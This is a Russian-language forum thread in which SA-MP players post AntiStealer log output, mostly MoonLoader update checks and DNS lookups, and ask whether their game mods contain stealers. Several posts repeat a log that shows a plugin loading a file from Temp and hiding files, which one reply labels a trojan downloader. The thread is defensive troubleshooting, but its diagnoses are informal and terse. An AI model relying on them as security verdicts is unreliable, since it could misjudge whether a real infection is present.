Статус
В этой теме нельзя размещать новые ответы.

Stonks

Участник
111
8
Что это
[PATCHED] > [RtlCreateProcessParametersEx] > [C:\Windows\system32\kernel32.dll] > {ImagePathName->Buffer: C:\Windows\system32\rundll32.exe}
Я в самп не могу зайти, он выключается автоматически
 
  • Нравится
Реакции: James Saula

James Saula

Активный
98
26
тут есть вредоносный код?

[WARNING] > [InternetOpenA] > [D:\RADMIR LAUNCHER\resources\projects\samp\crashes.asi] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\RADMIR LAUNCHER\resources\projects\samp\crashes.asi] > {lpszUrl: https://raw.githubusercontent.com/Whitetigerswt/gtasa_crashfix/master/LatestVersion.txt | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: raw.githubusercontent.com}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[WARNING] > [gethostbyname] > [D:\RADMIR LAUNCHER\resources\projects\samp\samp.dll] > {name: Home-PC}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
 

Вложения

  • !0AntiStealerByDarkP1xel32.LOG
    4.7 KB · Просмотры: 14

loganhenric

Новичок
3
0
Привет, иногда зависает самп когда ввожу пароль. Есть ли стиллер?

[PATCHED] > [RtlCreateProcessParametersEx] > [C:\Windows\SYSTEM32\KERNELBASE.dll] > {ImagePathName->Buffer: C:\Windows\system32\rundll32.exe}
[WARNING] > [InternetOpenA] > [E:\Games\GTA San Andreas (N-torrents.ru)\crashes.asi] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [E:\Games\GTA San Andreas (N-torrents.ru)\crashes.asi] > {lpszUrl: https://raw.githubusercontent.com/Whitetigerswt/gtasa_crashfix/master/LatestVersion.txt | lpszHeaders: -}
[WARNING] > [WinHttpCreateUrl] > [C:\Windows\SYSTEM32\WINHTTP.DLL] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[WARNING] > [WinHttpCreateUrl] > [C:\Windows\SYSTEM32\WINHTTP.DLL] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[PATCHED] > [ZwQueueApcThread] > [C:\Windows\SYSTEM32\sechost.dll]
[WARNING] > [URLDownloadToFileA] > [E:\Games\GTA San Andreas (N-torrents.ru)\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Aslanbek\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\Aslanbek\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; raidcall)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; raidcall)}
[WARNING] > [getaddrinfo] > [C:\Windows\SYSTEM32\WININET.dll] > {pNodeName: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\SYSTEM32\WS2_32.dll] > {pNodeName: -}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.dll] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [WinHttpCreateUrl] > [C:\Windows\SYSTEM32\WINHTTP.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [WinHttpCreateUrl] > [C:\Windows\SYSTEM32\WINHTTP.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[PATCHED] > [ZwQueueApcThread] > [C:\Windows\SYSTEM32\sechost.dll]
[WARNING] > [gethostbyname] > [E:\Games\GTA San Andreas (N-torrents.ru)\samp.dll] > {name: ddrq}
 

Vova335

Новичок
7
0
Как это убрать,что это означает?
[PATCHED] > [LoadLibraryW] > [C:\Windows\System32\KERNEL32.DLL] > {lpLibFileName: C:\Users\admin\AppData\Roaming\Discord\0.0.305\modules\discord_hook\6ba297492d\DiscordHook.dll}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [ZwSetInformationFile] > [C:\Windows\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [LoadLibraryA] > [E:\zakaz\modloader\.data\plugins\gta3\std.asi.dll] > {lpLibFileName: C:\Users\admin\AppData\Local\Temp\\samp.dat}
[WARNING] > [URLDownloadToFileA] > [E:\zakaz\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[PATCHED] > [ZwQueueApcThread] > [C:\Windows\System32\sechost.dll]
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
 

ShuffleBoy

Известный
Друг
753
425
Как это убрать,что это означает?
[PATCHED] > [LoadLibraryW] > [C:\Windows\System32\KERNEL32.DLL] > {lpLibFileName: C:\Users\admin\AppData\Roaming\Discord\0.0.305\modules\discord_hook\6ba297492d\DiscordHook.dll}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [ZwSetInformationFile] > [C:\Windows\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [LoadLibraryA] > [E:\zakaz\modloader\.data\plugins\gta3\std.asi.dll] > {lpLibFileName: C:\Users\admin\AppData\Local\Temp\\samp.dat}
[WARNING] > [URLDownloadToFileA] > [E:\zakaz\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[PATCHED] > [ZwQueueApcThread] > [C:\Windows\System32\sechost.dll]
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
Автообновление муна. Кидай лог полностью
 

FYS

Потрачен
982
236
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
тут есть вредоносный код?

[WARNING] > [InternetOpenA] > [D:\RADMIR LAUNCHER\resources\projects\samp\crashes.asi] > {lpszAgent: Mozilla/5.0}
[WARNING] > [InternetOpenUrlA] > [D:\RADMIR LAUNCHER\resources\projects\samp\crashes.asi] > {lpszUrl: https://raw.githubusercontent.com/Whitetigerswt/gtasa_crashfix/master/LatestVersion.txt | lpszHeaders: -}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\syswow64\WININET.dll] > {lpUrlComponents->lpszHostName: raw.githubusercontent.com}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\syswow64\WININET.dll] > {pName: raw.githubusercontent.com}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[WARNING] > [gethostbyname] > [D:\RADMIR LAUNCHER\resources\projects\samp\samp.dll] > {name: Home-PC}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[WARNING] > [GetAddrInfoW] > [C:\Windows\syswow64\WININET.dll] > {pNodeName: wpad}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
[PATCHED] > [RtlInitUnicodeString] > [C:\Windows\syswow64\KERNELBASE.dll] > {SourceString: !0AntiStealerByDarkP1xel32.ASI}
нету
 

Fix_ir

Активный
88
25
Помогите тупому... В чем здесь проблема?
Trojan.Downloader (крч вирус в плагинах/скриптах), проверяйте все скрипты LokiSA, SAMP Antivirus, AVP, aSteal


Как это убрать,что это означает?
[PATCHED] > [LoadLibraryW] > [C:\Windows\System32\KERNEL32.DLL] > {lpLibFileName: C:\Users\admin\AppData\Roaming\Discord\0.0.305\modules\discord_hook\6ba297492d\DiscordHook.dll}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [ZwSetInformationFile] > [C:\Windows\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [LoadLibraryA] > [E:\zakaz\modloader\.data\plugins\gta3\std.asi.dll] > {lpLibFileName: C:\Users\admin\AppData\Local\Temp\\samp.dat}
[WARNING] > [URLDownloadToFileA] > [E:\zakaz\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\urlmon.dll] > {lpszObjectName: /moonloader/data/version-info.json}
[PATCHED] > [ZwQueueApcThread] > [C:\Windows\System32\sechost.dll]
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: PC}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[WARNING] > [gethostbyname] > [E:\zakaz\samp.dll] > {name: 5.254.123.3}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
[PATCHED] > [OpenProcess] > [C:\Windows\System32\uiautomationcore.dll] > {dwProcessId: BAD PROCESS}
Вирус, проверяйте все скрипты LokiSA, SAMP Antivirus, AVP, aSteal
 

SuperROPE

Новичок
2
0
Меня смущают пару строк в моем логе, но я не могу понять от какого файла они здесь. Хелпаните
 

Вложения

  • !0AntiStealerByDarkP1xel32.LOG
    2.7 KB · Просмотры: 9

Fix_ir

Активный
88
25
[WARNING] > [gethostbyname] > [D:\GTA San Andreas\samp.dll] > {name: 46.174.53.100}
все нормально

Меня смущают пару строк в моем логе, но я не могу понять от какого файла они здесь. Хелпаните
это обновление moonloader'а, всё нормально

нормально
 

fdsgfds

Новичок
6
1
Помогите пожалуйста что это значит все?
[WARNING] > [URLDownloadToFileA] > [C:\Games\GTA San Andreas Multiplayer\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [InternetConnectA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [GetAddrInfoExW] > [C:\Windows\SYSTEM32\WININET.DLL] > {pName: blast.hk}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: Computer}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: 5.254.123.4}
[WARNING] > [gethostbyname] > [C:\Games\GTA San Andreas Multiplayer\samp.dll] > {name: 5.254.123.4}

Можно обновленный антистиллер для сампа пожалуйста! без стилерров

Здравствуйте админы! Можно пожалуйста новый антистиллер обновленный
 

DarkP1xel

Сила воли наше всё.
Автор темы
BH Team
3,635
4,983
Помогите пожалуйста что это значит все?
[WARNING] > [URLDownloadToFileA] > [C:\Games\GTA San Andreas Multiplayer\MoonLoader.asi] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {szURL: https://blast.hk/moonloader/data/version-info.json | szFileName: C:\Users\admin\AppData\Local\Temp\moonloader-version.json}
[WARNING] > [InternetOpenW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetOpenA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszAgent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0)}
[WARNING] > [InternetConnectW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [InternetConnectA] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpszServerName: blast.hk | lpszUserName: - | lpszPassword: -}
[WARNING] > [HttpOpenRequestW] > [C:\Windows\SYSTEM32\URLMON.DLL] > {lpszObjectName: /moonloader/data/version-info.json}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
[WARNING] > [InternetCreateUrlW] > [C:\Windows\SYSTEM32\WININET.DLL] > {lpUrlComponents->lpszHostName: blast.hk}
